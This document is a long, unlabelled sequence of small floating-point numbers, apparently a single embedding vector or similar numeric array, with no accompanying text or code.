-0.007600638549774885, 0.012274635955691338, 0.06972165405750275, -0.016898296773433685, -0.030057396739721298, -0.006924706511199474, -0.003118994180113077, -0.0216298196464777, -0.003226855769753456, -0.00820466224104166, -0.0006053725373931229, 0.016826389357447624, -0.017746808007359505, -0.01961640641093254, 0.03917528688907623, -0.02229137159883976, -0.026519540697336197, 0.030603894963860512, 0.005975525360554457, -0.019515736028552055, -0.0028421496972441673, -0.007917031645774841, -0.03437185660004616, -0.013036856427788734, 0.03224338963627815, 0.05574280768632889, 0.03805352747440338, 0.015647104009985924, 0.012792370282113552, 0.023024829104542732, -0.006331468466669321, -0.029510898515582085, -0.019659550860524178, -0.028461046516895294, 0.008219043724238873, -0.012713272124528885, 0.011073777452111244, -0.0015073640970513225, -0.0016332024242728949, 0.007165597286075354, -0.022794725373387337, 0.01960202492773533, 0.00934799388051033, 0.01895485632121563, -0.005860473494976759, 0.004835789557546377, -0.007528730668127537, -0.041936539113521576, -0.009031600318849087, 0.0008318815962411463, 0.025987423956394196, -0.005116228945553303, 0.009297658689320087, -0.010707048699259758, 0.010620759800076485, -0.015445763245224953, -0.02679278887808323, -0.010901199653744698, -0.02352818287909031, 0.008406003937125206, 0.036644138395786285, -0.005418241489678621, 0.009225751273334026, 0.00807522889226675, -0.034285567700862885, -0.018782278522849083, 0.014165806584060192, -0.04426634684205055, -0.01987527310848236, -0.02928079478442669, -0.008254998363554478, 0.03417051583528519, 0.0018444311572238803, -0.02013414166867733, 0.034803301095962524, -0.04530181735754013, -0.02007661573588848, -0.0036816715728491545, -0.011476460844278336, -0.04783296585083008, 0.016423705965280533, 0.0010156955104321241, -0.043432220816612244, 0.03612640127539635, 0.011498033069074154, -0.018969237804412842, -0.02262214571237564, -0.02988481894135475, 0.023111118003726006, 0.03117915615439415, -0.021356571465730667, 0.01627989113330841, 0.027166709303855896, 0.01428085844963789, 0.01177128218114376, -0.016092931851744652, 0.012986521236598492, 0.017818715423345566, 0.0014336587628349662, 0.025182059034705162, 0.011498033069074154, 0.014165806584060192, 0.010369082912802696, 0.0006300907698459923, 0.026231909170746803, -0.04256932809948921, 0.0019343157764524221, 0.006971446331590414, -0.013684025034308434, -0.006637075915932655, -0.007316603325307369, -0.021974977105855942, 0.026433251798152924, -0.0287630595266819, 0.0007941300864331424, -0.0009662590455263853, 0.044352635741233826, -0.0011900715762749314, -0.019961563870310783, 0.029654713347554207, -0.004731523338705301, 0.04021075740456581, -0.012195536866784096, -0.013360440731048584, -0.03071894682943821, 0.031006578356027603, -0.01072143018245697, 0.0037787468172609806, -0.03627021610736847, -0.017085257917642593, -0.0012835515663027763, 0.009887301363050938, 0.01766051910817623, 0.03215710073709488, 0.008125564083456993, -0.010440990328788757, 0.002061951905488968, 0.009441474452614784, -0.024880046024918556, -0.031409259885549545, -0.03575248271226883, -0.04371985048055649, 0.043691087514162064, -0.002761253621429205, -0.0013995026238262653, -0.0056771086528897285, 0.0013195053907111287, -0.006691006477922201, -0.003482127794995904, 0.018393976613879204, 0.01226025354117155, 0.01961640641093254, 0.005339142866432667, -0.019645169377326965, 0.027368050068616867, 0.025009479373693466, -0.001957685686647892, -0.0074855862185359, -0.0043432218953967094, 0.057094670832157135, -0.014374339021742344, 0.029237650334835052, 0.004508609417825937, -0.038456209003925323, -0.0028457450680434704, -0.023743905127048492, -0.019300011917948723, -0.03215710073709488, 0.018868567422032356, -0.004422320518642664, -0.009707532823085785, -0.008190280757844448, 0.031869471073150635, -0.0029338321182876825, 0.009161034598946571, -0.004361198749393225, 0.0037643653340637684, -0.017689282074570656, 0.0005262740887701511, -0.03796723857522011, -0.013281342573463917, 0.01333167776465416, -0.0013347857166081667, -0.0005860473611392081, -0.00027504676836542785, 0.01947259157896042, 0.03440061956644058, -0.02856171689927578, -0.007715690415352583, 0.034228041768074036, -0.020982651039958, -0.008743969723582268, -0.021342189982533455, 0.010440990328788757, 0.010023926384747028, -0.023974010720849037, -0.03569495677947998, -0.002647999208420515, -0.038657549768686295, -0.011835998855531216, -0.038600023835897446, -0.02301044762134552, -0.008463529869914055, 0.01190071552991867, -0.052521347999572754, 0.051485877484083176, 0.009326421655714512, -0.0186240803450346, 0.02968347631394863, -0.01639494299888611, 0.006137317977845669, -0.026131238788366318, -0.004386366344988346, -0.006453711539506912, 0.010297175496816635, -0.05450599640607834, 0.0037607699632644653, 0.005651941057294607, -0.04150509461760521, 0.025929898023605347, 0.02150038629770279, -0.023096736520528793, 0.0025473283603787422, 0.026059331372380257, -0.0057849702425301075, -0.012519121170043945, -0.018595317378640175, 0.008082419633865356, -0.00008027815056266263, 0.007039758842438459, -0.008657680824398994, -0.0011900715762749314, -0.005328356754034758, -0.017300980165600777, -0.020436152815818787, -0.015431380830705166, -0.043317168951034546, -0.0032915726769715548, -0.00501915393397212, 0.015215658582746983, 0.027037275955080986, 0.025153296068310738, 0.005910808686167002, 0.007952986285090446, 0.011526796035468578, -0.029194505885243416, 0.00047279277350753546, 0.01254788413643837, -0.0031423643231391907, -0.03828363120555878, -0.0072267185896635056, 0.023226169869303703, 0.03790971264243126, -0.015934735536575317, 0.009657196700572968, -0.004627257119864225, -0.025584740564227104, 0.015834063291549683, -0.031351733952760696, -0.021227138116955757, -0.020680639892816544, 0.0038794176653027534, 0.014769830740988255, -0.012245872057974339, 0.005195327568799257, -0.025124533101916313, -0.030057396739721298, -0.007499967701733112, -0.018393976613879204, -0.02393086440861225, 0.00039953686064109206, -0.008017702959477901, -0.0550524964928627, -0.007036163471639156, -0.020479297265410423, 0.012893041595816612, 0.00031212414614856243, 0.008046465925872326, 0.02321178838610649, 0.011210402473807335, -0.003904585260897875, -0.023183025419712067, -0.0222194641828537, -0.01173532847315073, 0.0008139046840369701, -0.004666806198656559, -0.007996130734682083, -0.013029665686190128, -0.0062487744726240635, -0.026160001754760742, -0.00895250216126442, -0.02249271236360073, 0.009010028094053268, -0.0007181776454672217, 0.021068941801786423, -0.005396668799221516, -0.0025419353041797876, -0.039980653673410416, 0.026188764721155167, -0.0370180569589138, 0.04429510980844498, -0.03155307471752167, -0.02026357501745224, 0.007550302892923355, -0.004336031153798103, 0.014029182493686676, -0.010534470900893211, -0.03126544505357742, -0.018077582120895386, -0.0014453437179327011, -0.016625048592686653, -0.025872372090816498, -0.024549271911382675, -0.007320198696106672, -0.03687424212694168, -0.015920354053378105, 0.0008772733272053301, 0.030316265299916267, -0.02798645757138729, 0.016754481941461563, 0.026231909170746803, -0.037219397723674774, 0.015790918841958046, 0.012173964641988277, 0.01594911701977253, 0.0038830130361020565, -0.006680220365524292, 0.016193602234125137, -0.006094173062592745, -0.015028698369860649, 0.0008080622064881027, -0.007068521808832884, -0.02380143105983734, -0.033508963882923126, 0.004188620485365391, 0.011512414552271366, 0.014338385313749313, -0.00010949063289444894, 0.020709402859210968, 0.02751186676323414, 0.001486690598540008, -0.02916574291884899, 0.019328774884343147, -0.031466785818338394, 0.0034335902892053127, 0.004943650681525469, 0.01177128218114376, -0.0015514075057581067, 0.036644138395786285, -0.016236746683716774, 0.010635141283273697, 0.0179769117385149, 0.022463949397206306, -0.005846092011779547, 0.017502320930361748, 0.000933900591917336, -0.0028888897504657507, -0.0028421496972441673, 0.02104017697274685, -0.03333638608455658, -0.007708499673753977, 0.03353772684931755, 0.015172514133155346, 0.0011972623178735375, -0.019127434119582176, 0.0040591866709291935, -0.014273667708039284, -0.0014507367741316557, -0.021946214139461517, 0.0020259979646652937, -0.03825486823916435, -0.008909357711672783, -0.006953469477593899, 0.062473364174366, 0.005741825792938471, -0.008499483577907085, 0.016308654099702835, -0.0116706108674407, 0.018192635849118233, -0.008938120678067207, 0.021974977105855942, -0.008096801117062569, -0.007212337106466293, 0.010980297811329365, -0.010297175496816635, 0.03908899798989296, -0.011138495057821274, 0.008111182600259781, -0.010577615350484848, -0.025052623823285103, -0.030488843098282814, -0.00415266677737236, -0.01274203509092331, -0.009836966171860695, -0.03992312774062157, -0.009405520744621754, -0.006842012517154217, -0.007938604801893234, -0.018192635849118233, 0.016035405918955803, 0.028719915077090263, -0.007036163471639156, 0.04294324666261673, -0.0056735132820904255, 0.0006943582557141781, -0.011656229384243488, -0.030114922672510147, 0.028130272403359413, 0.00519892293959856, -0.001853419584222138, -0.008139945566654205, -0.002290258649736643, -0.014554107561707497, 0.011318263597786427, 0.007277053780853748, -0.0024250855203717947, -0.0003074051928706467, -0.025671029463410378, -0.0018426334718242288, -0.02293854020535946, -0.009391139261424541, -0.008981265127658844, -0.017042113468050957, -0.016711337491869926, -0.014460627920925617, -0.021011414006352425, 0.002331605413928628, -0.005666322540491819, 0.0041742390021681786, -0.012770798057317734, 0.04978885501623154, -0.0008804192766547203, 0.025512833148241043, -0.0179769117385149, -0.02699413150548935, -0.026648974046111107, 0.005587224382907152, -0.008600154891610146, 0.012238681316375732, -0.008693634532392025, -0.01948697306215763, 0.018020056188106537, -0.013525828719139099, 0.012885850854218006, 0.01745917648077011, 0.007377724628895521, -0.013036856427788734, -0.0037643653340637684, 0.00967876985669136, 0.0058928318321704865, -0.012087675742805004, 0.0358387716114521, 0.022866632789373398, -0.003861440811306238, 0.02275157906115055, -0.01563272252678871, 0.006680220365524292, -0.039319101721048355, -0.014532535336911678, 0.021198375150561333, -0.004203001968562603, -0.009700342081487179, 0.012303398922085762, -0.013317296281456947, -0.005364310462027788, 0.02398839220404625, 0.0022758771665394306, 0.01869598776102066, -0.005256448872387409, 0.0033526939805597067, -0.007320198696106672, -0.02439107373356819, -0.009333612397313118, 0.02431916631758213, 0.006374612916260958, -0.007758835330605507, 0.0071152616292238235, 0.018207017332315445, -0.012145201675593853, 0.008477911353111267, -0.004253337159752846, -0.005357119720429182, -0.008276570588350296, 0.014525344595313072, 0.002730692969635129, -0.011907906271517277, -0.01666819304227829, 0.0023693570401519537, 0.00529599841684103, 0.012569457292556763, 0.005903617944568396, 0.014798593707382679, -0.005968334618955851, 0.017300980165600777, 0.009491809643805027, -0.015977879986166954, -0.02882058545947075, 0.013374822214245796, -0.011641847901046276, 0.01576215587556362, 0.00042942349682562053, 0.02280910685658455, -0.021299045532941818, 0.020450534299016, 0.006234392989426851, -0.02974100410938263, -0.005263639613986015, 0.029367083683609962, -0.03319257125258446, -0.023096736520528793, -0.003958515822887421, 0.012497548945248127, 0.01548890769481659, -0.0015154536813497543, -0.012346543371677399, 0.023902101442217827, -0.020838836207985878, -0.013935701921582222, 0.006151699461042881, -0.001830049674026668, -0.025541596114635468, -0.02418973296880722, 0.024592416360974312, -0.002730692969635129, 0.03486082702875137, -0.010944344103336334, 0.007830742746591568, 0.0027396813966333866, -0.008068038150668144, -0.02437669225037098, 0.01594911701977253, 0.005630368832498789, 0.0005249258247204125, -0.018552172929048538, -0.019587643444538116, 0.01402199175208807, 0.00410233112052083, 0.005328356754034758, -0.00009847977344179526, -0.009463046677410603, -0.014367148280143738, -0.016826389357447624, -0.006460902281105518, -0.031725652515888214, -0.026318199932575226, -0.0038578452076762915, -0.003861440811306238, 0.02784264087677002, -0.011490842327475548, -0.0035881916992366314, -0.023585708811879158, 0.020306719467043877, 0.007269863039255142, -0.01830768771469593, 0.005943167023360729, 0.005630368832498789, 0.008413194678723812, -0.02234889753162861, 0.010929962620139122, -0.010663904249668121, 0.02798645757138729, 0.010282794013619423, 0.027569392696022987, 0.018839804455637932, 0.009319230914115906, -0.012303398922085762, 0.0019145411206409335, 0.03319257125258446, -0.02293854020535946, 0.0016646620351821184, -0.02889249287545681, 0.020493680611252785, 0.010354701429605484, 0.027598155662417412, 0.013820650056004524, 0.019788984209299088, -0.004533777013421059, -0.004792644642293453, 0.004990390967577696, 0.0017473557963967323, -0.002502386225387454, -0.009283277206122875, -0.0014246703358367085, 0.013080000877380371, 0.003739197738468647, -0.02137095294892788, 0.010671094991266727, -0.010210885666310787, -0.01118163950741291, 0.015445763245224953, 0.0021752063184976578, 0.005846092011779547, 0.01238249707967043, -0.017099639400839806, 0.006601122207939625, 0.028878111392259598, -0.004400748293846846, -0.003101017326116562, -0.015776537358760834, 0.008621727116405964, 0.00475309556350112, 0.01418737880885601, -0.040901068598032, -0.011418934911489487, 0.023614471778273582, 0.03687424212694168, 0.005170159973204136, -0.021845543757081032, 0.01177128218114376, -0.01205891277641058, 0.012871469371020794, -0.015086224302649498, -0.0058928318321704865, -0.008808687329292297, -0.024304784834384918, -0.01613607630133629, -0.0056123919785022736, -0.0015046675689518452, -0.03894518315792084, 0.00037751515628769994, 0.014661969617009163, 0.026778407394886017, -0.01994718238711357, -0.011915097013115883, 0.014712304808199406, -0.012411260046064854, 0.011088158935308456, -0.005666322540491819, 0.0033778618089854717, -0.01441748347133398, -0.022248227149248123, 0.009355184622108936, 0.0027774330228567123, 0.011548368260264397, 0.00135995342861861, -0.018149489536881447, 0.004993986338376999, -0.007248290814459324, 0.0174447949975729, 0.0037643653340637684, -0.03296246752142906, 0.003976493142545223, -0.011102540418505669, 0.011857571080327034, -0.003714029910042882, -0.004325245041400194, -0.020090997219085693, -0.02295292168855667, -0.008298142813146114, 0.0015136559959501028, -0.0033005611039698124, -0.015647104009985924, -0.01778995245695114, -0.012080485001206398, -0.022003740072250366, -0.0021985762286931276, 0.04883967339992523, -0.01921372301876545, 0.005080275237560272, 0.012591029517352581, -0.020033471286296844, -0.008334096521139145, 0.00762940151616931, 0.021989358589053154, -0.00465602008625865, 0.007162001915276051, 0.014769830740988255, 0.01489926502108574, 0.00207633338868618, -0.03051760606467724, 0.008995646610856056, 0.02378704957664013, -0.00034043777850456536, -0.002054760931059718, -0.020090997219085693, -0.0002656088618095964, -0.0056699179112911224, 0.0050371307879686356, 0.00912508089095354, 0.002218351000919938, -0.004666806198656559, 0.015517670661211014, 0.008513865992426872, 0.0043504126369953156, -0.006770105101168156, 0.012303398922085762, 0.004533777013421059, -0.014597252942621708, -0.011030633002519608, -0.022722816094756126, 0.032387204468250275, -0.028288468718528748, -0.019702695310115814, 0.010469753295183182, -0.021859925240278244, 0.010174931958317757, -0.010671094991266727, 0.02463556081056595, -0.021672965958714485, 0.015402617864310741, -0.014072326943278313, 0.030690183863043785, 0.026160001754760742, -0.00694268336519599, -0.01947259157896042, 0.016251128166913986, 0.00836285948753357, 0.01994718238711357, 0.0051413970068097115, 0.012504739686846733, 0.009844156913459301, 0.005662727169692516, 0.007237504702061415, -0.02953966148197651, -0.00235317787155509, 0.008470720611512661, -0.02837475761771202, 0.012569457292556763, -0.003230451140552759, -0.03698929399251938, 0.022104410454630852, 0.022694053128361702, 0.006000693421810865, -0.04058467596769333, 0.004505014047026634, 0.006831226404756308, 0.009290467947721481, 0.03678795322775841, 0.017545465379953384, -0.018796660006046295, 0.000620203441940248, 0.016179220750927925, 0.013439539819955826, 0.0029464159160852432, -0.03934786468744278, -0.009161034598946571, -0.017876241356134415, 0.007888268679380417, 0.003706839168444276, -0.0060042887926101685, 0.003548642387613654, -0.01146927010267973, -0.03652908653020859, 0.010944344103336334, 0.001236811513081193, 0.01447500940412283, -0.014755449257791042, 0.02354256436228752, -0.007607829291373491, 0.007996130734682083, 0.01310157310217619, 0.006575954612344503, 0.01705649495124817, 0.001389615354128182, -0.02078131027519703, 0.003564821556210518, -0.006996614392846823, 0.005544079467654228, -0.012138010933995247, -0.011030633002519608, 0.00925451423972845, 0.018091963604092598, 0.015661485493183136, 0.02732490561902523, -0.0192712489515543, -0.00584968738257885, 0.007557493634521961, -0.001535228337161243, -0.01255507580935955, -0.0020529632456600666, -0.024462981149554253, 0.027698826044797897, 0.0041670482605695724, 0.019371921196579933, 0.03468824923038483, 0.03414175286889076, 0.03678795322775841, 0.015575196593999863, -0.026907842606306076, 0.002869115211069584, -0.019256867468357086, 0.0222194641828537, 0.007679736707359552, 0.032387204468250275, -0.03287617489695549, -0.0022579000797122717, 0.0027594559360295534, 0.007974558509886265, 0.01640932448208332, -0.02673526294529438, -0.014158615842461586, 0.004825002979487181, -0.006906729657202959, -0.03155307471752167, -0.000795927771832794, -0.01232497114688158, -0.011929478496313095, -0.023499419912695885, -0.007859505712985992, -0.0066442666575312614, 0.01725783571600914, -0.019184960052371025, 0.005472172051668167, 0.00028448464581742883, 0.01790500432252884, -0.006777295842766762, 0.028475428000092506, -0.03345143795013428, -0.0038111053872853518, 0.03744950145483017, -0.012030149810016155, -0.022694053128361702, 0.0006008782656863332, -0.01297213975340128, -0.01186476182192564, 0.01914181560277939, -0.00575261190533638, -0.02948213554918766, 0.014726686291396618, 0.003638526890426874, -0.0042856959626078606, 0.0010372678516432643, 0.021011414006352425, 0.006104959174990654, -0.00496881827712059, -0.012993711978197098, -0.012749225832521915, -0.008600154891610146, 0.005062298383563757, 0.014000419527292252, -0.010786146856844425, -0.029367083683609962, -0.011361408047378063, 0.022320134565234184, 0.01100906077772379, 0.028130272403359413, 0.006924706511199474, -0.04541686922311783, 0.025182059034705162, -0.017674900591373444, 0.0076222107745707035, 0.006975041702389717, -0.012310589663684368, 0.0014102887362241745, -0.007392106112092733, -0.02170172892510891, 0.0075143491849303246, 0.020968269556760788, 0.0017922981642186642, 0.005285212304443121, 0.018811041489243507, -0.007830742746591568, -0.00021268933778628707, -0.00024965437478385866, -0.012936186045408249, -0.00020650977967306972, -0.023312458768486977, -0.0024520508013665676, -0.02765568159520626, 0.01392132043838501, 0.0015343294944614172, 0.023959629237651825, -0.00849229283630848, -0.007000209763646126, 0.014431864954531193, -0.00028448464581742883, 0.010577615350484848, 0.0073345801793038845, -0.015316328965127468, 0.018782278522849083, 0.006611908320337534, -0.0014102887362241745, -0.008326905779540539, 0.008334096521139145, -0.009484618902206421, 0.025138914585113525, -0.010635141283273697, -0.005842496640980244, -0.013928511179983616, -0.028849348425865173, 0.020680639892816544, -0.011490842327475548, 0.006744937505573034, 0.00039144724723882973, 0.009419902227818966, -0.002906866604462266, 0.007758835330605507, -0.005418241489678621, 0.005853282753378153, 0.0024178947787731886, 0.01607855036854744, 0.007363343145698309, -0.0016053383005782962, -0.004188620485365391, 0.01646685227751732, 0.01569024845957756, -0.009628433734178543, -0.001954090315848589, -0.012360924854874611, 0.009592480026185513, 0.007000209763646126, -0.012792370282113552, 0.027411196380853653, 0.020450534299016, 0.021270282566547394, -0.005062298383563757, -0.011742519214749336, -0.009067554026842117, -0.005878450348973274, 0.0030956242699176073, 0.015776537358760834, 0.03379659354686737, 0.013180672191083431, 0.0027127161156386137, -0.011512414552271366, -0.015675866976380348, -0.007924222387373447, 0.004113117698580027, -0.001718592830002308, -0.008981265127658844, -0.003958515822887421, -0.007830742746591568, 0.00085570098599419, 0.006888752803206444, 0.02418973296880722, 0.015704629942774773, 0.018336450681090355, 0.018595317378640175, 0.0025473283603787422, 0.005299593787640333, -0.006784486584365368, -0.003814700758084655, 0.010275603272020817, -0.029654713347554207, 0.0037679607048630714, -0.003987279254943132, 0.0017365696839988232, -0.0045733265578746796, 0.01548890769481659, -0.010929962620139122, 0.0057813748717308044, -0.00006572808342752978, -0.006687411107122898, 0.0009500798187218606, -0.014295240864157677, -0.018523409962654114, -0.0028026006184518337, -0.007780407555401325, -0.012475976720452309, -0.015057461336255074, 0.0005105442833155394, 0.0001455006276955828, 0.03247349336743355, -0.011706565506756306, -0.007593447808176279, 0.002914057346060872, -0.011663420125842094, -0.012706081382930279, 0.011649038642644882, -0.025671029463410378, 0.013396394439041615, 0.013777505606412888, -0.007751644589006901, -0.002847542753443122, 0.005285212304443121, -0.0017779165646061301, 0.014237714000046253, -0.022061266005039215, 0.01947259157896042, 0.010282794013619423, 0.00807522889226675, -0.02824532426893711, 0.013094382360577583, 0.005623178090900183, 0.008995646610856056, 0.01222429983317852, 0.005414646118879318, -0.025973042473196983, -0.02138533443212509, 0.01232497114688158, -0.0022866632789373398, -0.01226025354117155, -0.0010480539640411735, -0.012670127674937248, -0.0048070261254906654, 0.005831710062921047, -0.004242551047354937, 0.002477218396961689, 0.00652202358469367, -0.004530181642621756, 0.0059000225737690926, 0.023628853261470795, 0.021227138116955757, 0.01863846182823181, -0.012540693394839764, 0.021342189982533455, 0.002238125540316105, -0.005817328579723835, -0.009110699407756329, -0.009700342081487179, 0.0057885656133294106, 0.020953888073563576, -0.0009069351945072412, -0.004537372384220362, -0.013497065752744675, -0.01686953380703926, 0.009276086464524269, -0.025541596114635468, -0.019846510142087936, 0.005529697984457016, 0.0022668885067105293, -0.013417967595160007, -0.011152876541018486, -0.031869471073150635, -0.0018066796474158764, -0.00498320022597909, 0.004203001968562603, -0.004576921928673983, -0.009060363285243511, 0.009470237419009209, 0.022003740072250366, 0.00010033364378614351, -0.02406029962003231, 0.010117406025528908, 0.012864278629422188, -0.011152876541018486, -0.01434557605534792, -0.004134689923375845, 0.012634173966944218, 0.010512897744774818, 0.004950841423124075, 0.013806268572807312, 0.01036189217120409, 0.004864552523940802, -0.00666583888232708, -0.017531083896756172, 0.01574777439236641, -0.00820466224104166, 0.013072810135781765, 0.009319230914115906, 0.0024592415429651737, -0.006550786551088095, -0.009858538396656513, -0.0003732456243596971, -0.0009752474725246429, 0.012864278629422188, -0.0011667015496641397, 0.0034425787162035704, 0.0057166581973433495, 0.0008148035267367959, 0.007967367768287659, -0.007708499673753977, 0.0036960530560463667, 0.012763607315719128, -0.0017248847289010882, 0.0025113746523857117, 0.026577066630125046, -0.023873338475823402, -0.003372468752786517, 0.02249271236360073, 0.014669160358607769, -0.00010274929081788287, -0.00001062463616108289, -0.004192215856164694, -0.014561298303306103, 0.031006578356027603, -0.01510060578584671, 0.004864552523940802, -0.015532052144408226, -0.005950357764959335, 0.00620922539383173, -0.021198375150561333, -0.00025684511638246477, -0.010743002407252789, -0.010218076407909393, -0.002126668579876423, 0.007535921409726143, 0.006885157432407141, 0.016941441223025322, 0.017689282074570656, -0.007464013993740082, -0.0074855862185359, -0.021299045532941818, -0.0018965642666444182, -0.021155230700969696, -0.005195327568799257, -0.014295240864157677, 0.019184960052371025, 0.012073294259607792, 0.0022363278549164534, -0.013080000877380371, 0.021097704768180847, -0.007370533887296915, -0.00898845586925745, 0.010793337598443031, 0.0050982520915567875, -0.025973042473196983, 0.016783244907855988, 0.0013653464848175645, 0.014237714000046253, 0.017099639400839806, 0.01594911701977253, -0.027224235236644745, 0.009060363285243511, -0.005802947096526623, 0.005076679866760969, 0.007528730668127537, 0.012799561023712158, -0.008370050229132175, -0.004490632563829422, -0.004469060339033604, 0.008312524296343327, 0.0156183410435915, 0.007492776960134506, -0.023283695802092552, -0.004508609417825937, -0.003156745806336403, 0.020953888073563576, -0.0015415202360600233, -0.013604926876723766, -0.01095153484493494, 0.004717141855508089, 0.017401650547981262, -0.0030992196407169104, -0.027483103796839714, -0.016092931851744652, 0.0026965367142111063, 0.012519121170043945, -0.013173481449484825, 0.016035405918955803, 0.0020709403324872255, 0.005403859540820122, 0.005644750315696001, 0.01639494299888611, -0.0009464843897148967, -0.02347065694630146, -0.019328774884343147, -0.013655262067914009, 0.025067005306482315, 0.011792854405939579, 0.004339626524597406, -0.023111118003726006, 0.033882882446050644, 0.004012446850538254, 0.002148241037502885, 0.01268450915813446, -0.023974010720849037, 0.010901199653744698, 0.02621752768754959, -0.0052061136811971664, -0.009405520744621754, 0.01674010045826435, 0.004364794120192528, -0.00616248557344079, -0.008585773408412933, -0.012706081382930279, 0.016524378210306168, -0.002764848992228508, -0.008743969723582268, -0.006921111140400171, 0.012921804562211037, 0.009563717059791088, 0.03557990491390228, -0.022780342027544975, -0.000019606070054578595, 0.013065619394183159, -0.0072231232188642025, -0.019199341535568237, 0.0016826390055939555, -0.01003830786794424, 0.035205986350774765, 0.006223606877028942, -0.015862826257944107, -0.0021176801528781652, -0.0017644339241087437, 0.0014219736913219094, 0.004803430754691362, 0.019573261961340904, 0.0022471139673143625, 0.016092931851744652, -0.013439539819955826, 0.01640932448208332, 0.020608732476830482, 0.008585773408412933, -0.009031600318849087, -0.014561298303306103, -0.0335952527821064, 0.006101363804191351, 0.0042353603057563305, 0.011656229384243488, 0.017531083896756172, 0.026001805439591408, 0.017948148772120476, -0.0019037550082430243, 0.021169612184166908, 0.024851283058524132, 0.006155294831842184, 0.0025347445625811815, -0.0002999897114932537, -0.010714239440858364, -0.009362375363707542, 0.012871469371020794, 0.02496633492410183, 0.00967876985669136, 0.01627989113330841, 0.009189797565340996, -0.001871396554633975, 0.010059880092740059, 0.002126668579876423, -0.0057813748717308044, -0.00882306881248951, -0.017272217199206352, -0.02052244357764721, 0.010045498609542847, 0.023772668093442917, -0.015934735536575317, -0.0198033656924963, 0.012396878562867641, 0.0022884609643369913, -0.023887719959020615, 0.005709467455744743, -0.02065187692642212, 0.011713756248354912, -0.0015559017192572355, -0.02201812155544758, -0.021874306723475456, 0.014640397392213345, -0.0016152255702763796, -0.005529697984457016, -0.0037176255136728287, -0.0035324632190167904, -0.02647639624774456, -0.012928995303809643, 0.006615503691136837, 0.015790918841958046, 0.022924158722162247, 0.005202518310397863, 0.020033471286296844, 0.012734844349324703, -0.01154117751866579, -0.009549335576593876, 0.01836521364748478, -0.003534260904416442, 0.0023172239307314157, -0.027094801887869835, 0.009599670767784119, 0.015920354053378105, 0.009721914306282997, 0.012706081382930279, -0.003825486870482564, 0.019041145220398903, -0.03667290136218071, 0.03730568662285805, 0.01987527310848236, -0.005860473494976759, -0.028144653886556625, -0.010886818170547485, -0.0001353886182187125, -0.00006544719508383423, -0.024549271911382675, -0.005091061349958181, -0.009211369790136814, 0.00941271148622036, -0.010534470900893211, -0.030057396739721298, -0.0019397088326513767, -0.006874371320009232, 0.006777295842766762, 0.016812007874250412, -0.00780917052179575, -0.01320224441587925, 0.0011846785200759768, -0.00606541009619832, 0.007435251027345657, -0.0019415065180510283, 0.00941271148622036, -0.01816387102007866, 0.006834821775555611, -0.010476944036781788, 0.0029572020284831524, 0.004821407608687878, -0.03293370455503464, 0.011677801609039307, -0.028015220537781715, 0.007212337106466293, -0.018120726570487022, 0.0013743349118158221, -0.0004031322605442256, -0.030229974538087845, -0.015517670661211014, 0.00037639160291291773, 0.0020835241302847862, 0.0019217318622395396, -0.010174931958317757, -0.006176867056638002, -0.008060847409069538, -0.013223816640675068, 0.010239648632705212, -0.01836521364748478, -0.015862826257944107, 0.018480265513062477, 0.002775635104626417, 0.003280786331743002, 0.021687347441911697, 0.001072322833351791, -0.02431916631758213, -0.013223816640675068, 0.013540210202336311, -0.03980807214975357, -0.0013401787728071213, 0.0025239584501832724, -0.014165806584060192, -0.007787598296999931, 0.0011046812869608402, -0.02752624824643135, 0.024750612676143646, 0.010203694924712181, -0.0002388682187302038, -0.0023369984701275826, 0.0007981748785823584, -0.006033051759004593, 0.010656713508069515, -0.038743842393159866, -0.006928301881998777, 0.013849413022398949, 0.01150522381067276, -0.022650908678770065, -0.004947246052324772, 0.00973629578948021, 0.00944866519421339, -0.010807719081640244, -0.0014300633920356631, 0.018422739580273628, 0.004357603378593922, 0.009499000385403633, 0.01190071552991867, -0.0010031117126345634, -0.029712239280343056, -0.013374822214245796, -0.014302431605756283, 0.013806268572807312, 0.02059435099363327, 0.002311830874532461, -0.019645169377326965, 0.018480265513062477, 0.0018498242134228349, -0.022909777238965034, -0.02260776422917843, 0.013518637977540493, 0.01238249707967043, 0.03805352747440338, 0.020450534299016, -0.010865245945751667, 0.01640932448208332, 0.008240616880357265, -0.006913920398801565, -0.0011846785200759768, 0.012066103518009186, -0.021299045532941818, 0.0018282519886270165, 0.003329324070364237, -0.0008161517907865345, -0.0017239858862012625, -0.005601605866104364, -0.007679736707359552, 0.00902440957725048, -0.006428543943911791, 0.011519605293869972, 0.0016152255702763796, 0.00021886891045141965, 0.00011072654160670936, -0.006277537904679775, 0.007165597286075354, -0.010937153361737728, -0.01921372301876545, -0.012928995303809643, -0.009570907801389694, 0.00012875963875558227, 0.017300980165600777, 0.004044805187731981, -0.029395846650004387, 0.0007824450731277466, -0.01882542297244072, -0.02667773701250553, -0.019170578569173813, -0.004300077445805073, 0.005454195197671652, -0.0012143404455855489, 0.008966883644461632, -0.006680220365524292, -0.013389203697443008, -0.020090997219085693, 0.004249741788953543, 0.001531632849946618, 0.028849348425865173, -0.005472172051668167, -0.013835031539201736, 0.011426125653088093, -0.017933767288923264, 0.0049220784567296505, 0.013425158336758614, -0.012806751765310764, -0.003388647921383381, -0.015316328965127468, 0.011555559001863003, 0.010052689351141453, 0.013971655629575253, -0.0026893459726125, -0.018609698861837387, 0.004825002979487181, -0.015719011425971985, 0.013748742640018463, -0.02124151960015297, 0.012921804562211037, -0.007535921409726143, -0.008406003937125206, 0.0023190216161310673, -0.012591029517352581, 0.021687347441911697, -0.005130610894411802, -0.002324414672330022, -0.020637495443224907, 0.017703663557767868, 0.0020745357032865286, 0.0024969931691884995, -0.01297213975340128, 0.014295240864157677, -0.03209957480430603, 0.011979814618825912, -0.018063200637698174, 0.010958725586533546, 0.0008175000548362732, -0.0003757174708880484, 0.023355603218078613, -0.022176317870616913, -0.00410233112052083, -0.002985964994877577, 0.01640932448208332, 0.006482474505901337, -0.006985827814787626, 0.005001177079975605, 0.002020604908466339, -0.005299593787640333, 0.005946762394160032, -0.010498516261577606, 0.02953966148197651, -0.01200138684362173, 0.004760286305099726, 0.028648007661104202, -0.008736778981983662, -0.025771701708436012, -0.0006282930844463408, -0.005738230422139168, 0.0023064378183335066, -0.001826454303227365, -0.01062795054167509, -0.004012446850538254, -0.037564557045698166, 0.002155431779101491, 0.03132297098636627, 0.008902166970074177, -0.016696956008672714, 0.01994718238711357, -0.0006485171034000814, 0.009132271632552147, 0.035982586443424225, 0.004077163524925709, -0.000982438214123249, 0.010419418103992939, 0.011196020990610123, -0.00209970329888165, 0.020896362140774727, -0.019975945353507996, 0.0060078841634094715, 0.003140566637739539, 0.012641364708542824, -0.017157165333628654, 